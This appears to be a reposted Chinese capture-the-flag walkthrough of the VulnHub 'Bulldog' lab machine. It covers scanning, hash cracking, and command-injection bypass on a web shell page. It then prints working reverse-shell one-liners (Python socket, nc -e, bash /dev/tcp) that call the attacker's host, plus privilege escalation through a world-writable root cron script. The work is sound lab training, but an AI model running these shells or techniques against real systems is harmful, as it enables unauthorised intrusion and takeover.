尧图网络 高端网站定制 · 原创设计
免费咨询热线
400-888-6620
免费获取方案
VulnHub 系列:Bulldog,walkthrough
前言这个靶机在vmware安装后无法被扫描到ip。参照上一篇前言的方法修改靶机ip地址为静态192.168.152.129。一、信息收集1查看 kali 攻击机的 IP 地址ifconfig2查看同网段有哪些设备netdiscover -r 192.168.152.0/24Nmap 扫描端口和服务nmap -sS -sV -T4 -A -p- 192.168.152.129WSGI全称是 Web Server Gateway InterfaceWSGI 不是服务器、 python 模块、框架、API 或者任何软件只是一种规范描述 web server 如何与 web application 通信的规范。Dirb 目录爆破dirb http://192.168.152.129查看网页及源代码根据上面爆破出的目录对网页进行查看。/admin 是个管理员后台 常见的弱口令无法进入/dev 目录 网页上可以看到开发小组人员的邮箱和密码 hash 值可以发现都是用的公司的邮箱 那么邮箱里面可能就包含了开发小组人员的名字。解密常用网站 CMD5 SOMD5解密结果 alan 用户解密失败 william 用户解密失败 malik 用户解密失败 kevin 用 户解密失败 ashley 用户解密失败 nick/bulldog sarah/bulldoglover。2其他的有用信息• 网站使用的是 Django而不是 PHP并且没有使用 PHPMyAdmin 或者任何 有名的 CMS 框架• 开启了 SSH但很快就会被后续的 Web-Shell 取代并且下面给出了 Web- Shell 页面的连接二、反弹 shell使用 nick/bulldog 登录后台 http://192.168.152.129/admin 登录后台之后没有发现 什么有用的功能或信息。记得前面还有一个http://192.168.152.129/dev/shell/页面访问一下看看。根据页面的提示用户可以执行的命令只有上述的几个但是这里可以 使用将多个命令进行拼接那么就可以绕过限制。首先在 kali 攻击机上监听端口nc -lvp 12341.通过 bash(实测没有反弹成功)2.通过 python(成功反弹)1在kali机上编写 python 脚本内容如下vim python-shell.pyimport os,socket,subprocess; ssocket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((192.168.152.128,1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); psubprocess.call([/bin/bash,-i]);把python-shell.py 放在kali机桌面上以便后续操作。2在 kali 上使用 python 开启 HTTP 服务python3 -m http.server 803在http://192.168.152.129/dev/shell/ 页面使用 wget 下载 python 脚本pwdwget http://192.168.152.128/Desktop/python-shell.py4在 /dev/shell 页面执行脚本pwdpython python-shell.py3.通过 nc(需要靶机上安装了 nc。若无可先下载到kali机再通过wget下载到靶机)nc -e /bin/bash 192.168.152.128 12344.通过 echo(成功反弹)echo bash -i /dev/tcp/192.168.152.128/1234 01 | bash三、提权发现 home 目录下有一个 bulldogadmin那么优先查看这个目录。 结果执行 ls 命令时没有发现任何东西然后我执行了 ls -a发现了隐藏的文件夹。.hiddenadmindirectory 引起了注意接着在这个文件夹里面发现了 customPermissionApp 文件使用 file 命令查看一下这是个什么东西原来是个 ELF简单来说就是 Linux 的主要可执行文件格式。 然后就是这个目录下还有一个 note 文件是一些提示信息。后面就执行了 strings 命令。strings customPermissionApp神奇的是红框的地方SUPERultimatePASSWORDyouCANTget就是 django 账户的密码。SSH 登录确认一下。ssh -p 23 django192.168.152.1291第一种权限提升的方式查看 django 用户可以执行哪些命令id sudo -l我们可以看到 django 用户可以执行所有的命令于是我们通过执行以下命令切换 到 root 账户sudo su -2. 第二种权限提升的方式用了一个 Github 上的一个权限提升检查的脚本用以查看靶机上有哪些对权限提 升有帮助的东西linuxprivchecker.py。这个脚本可以做什么1枚举系统的基本信息2查找具有全局可写属性的文件3查找错误的配 置文件4查找明文密码5查找系统存在的可利用漏洞运行 linuxprivchecker 脚本看到了几个使用 root 权限执行的计划任务。这里从kali机下载curl -O http://192.168.152.128:8081/linuxprivchecker.py运行脚本python linuxprivchecker.py -w -o linuxprivchecker.log然后我们使用 cat 命令挨个查看几个计划任务发现 runAV 每分钟执行一次名叫 AVApplication.py 的 python 脚本。cat runAV并且这个脚本是全局用户可写的那么接下来的思路就是编辑这个脚本然后反弹 shell因为通过这种方式反弹 过来的 shell 是具有 root 权限的。vim /.hiddenAVDirectory/AVApplication.py在kali机上执行以下代码nc -nlvp 1234等待一分钟后id pwd ls cat congrats.txt
RELATED

相关推荐

白龙桥靠谱聚餐土菜馆推荐|地道农家菜 + 特色煲品,家庭好友小聚很合适

白龙桥靠谱聚餐土菜馆推荐|地道农家菜 + 特色煲品,家庭好友小聚很合适

金华白龙桥塔石土菜馆|地道农家菜特色煲品,家庭聚餐好友小聚首选 ——白龙桥必打卡的宝藏土菜馆,金华美食探店不踩雷指南 摘要: 探寻金华美食,怎能错过地道的农家菜体验?位于白龙桥的塔石土菜馆&#xff0c…

📅 2026/8/23 7:39:41
Ubuntu安装与高效使用tldr:命令行速查手册全攻略

Ubuntu安装与高效使用tldr:命令行速查手册全攻略

1. 项目概述:为什么我们需要 tldr?在 Ubuntu 或者其他任何 Linux 发行版里摸爬滚打过的朋友,大概都经历过这样的场景:面对一个不太熟悉的命令,第一反应是打开终端,输入man命令,然后……就被淹没…

📅 2026/9/2 11:34:13
新手小白快速理解——SENet注意力机制

新手小白快速理解——SENet注意力机制

官方GitHub链接:https://github.com/hujie-frank/SENethttps://github.com/hujie-frank/SENet 原文链接:[1709.01507] Squeeze-and-Excitation Networkshttps://arxiv.org/abs/1709.01507 感兴趣的朋友可以自行下载,下面就让我们开始今天的…

📅 2026/9/26 8:33:53
MORE NEWS

更多资讯

📰

Linux进程管理本质:ps与kill的内核级原理与实战诊断

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

📰

Java终端乱码根源与四层UTF-8校准方案

1. 问题本质与真实影响范围:这不是“显示异常”,而是编码链路的系统性断裂你点下F5运行一个Java程序,终端里蹦出来的不是“你好世界”,而是“浣犲ソ涓栫晫”或者一堆问号、方块、UFFFD符号——这种场景我过去三年在带新人、做企业…

📰

虚幻引擎5.9升级实战与核心技术解析

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

📰

多模态大模型统一理解:从技术底座到工程落地全解析

1. 多模态大模型到底在解决什么问题1.1 从“单科状元”到“全科通才”的转变过去几年我们接触的AI模型,绝大多数是“偏科生”。文本模型只认字,图像模型只看图,语音模型只听话。你给一个文本模型发一张图,它只能告诉你“我收到了一…

📰

Unreal Engine项目结构深度解析:Config-Content-Build三层契约体系

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

📰

32位Windows 7运行Steam游戏的完整解决方案

1. 项目概述:在2026年让32位Windows 7真正跑起Steam游戏,不是“能打开”,而是“能玩通”2026年还在用32位Windows 7?听起来像在古董机房里调试一台奔腾4服务器。但现实是:大量工业控制终端、老旧医疗设备后台、学校机房…

TODAY

今日更新

THIS WEEK

本周精选

THIS MONTH

本月热门

读完文章,想聊聊您的网站?

告诉我们您的行业与需求,资深顾问一对一梳理方案与报价,全程免费。

📞 💬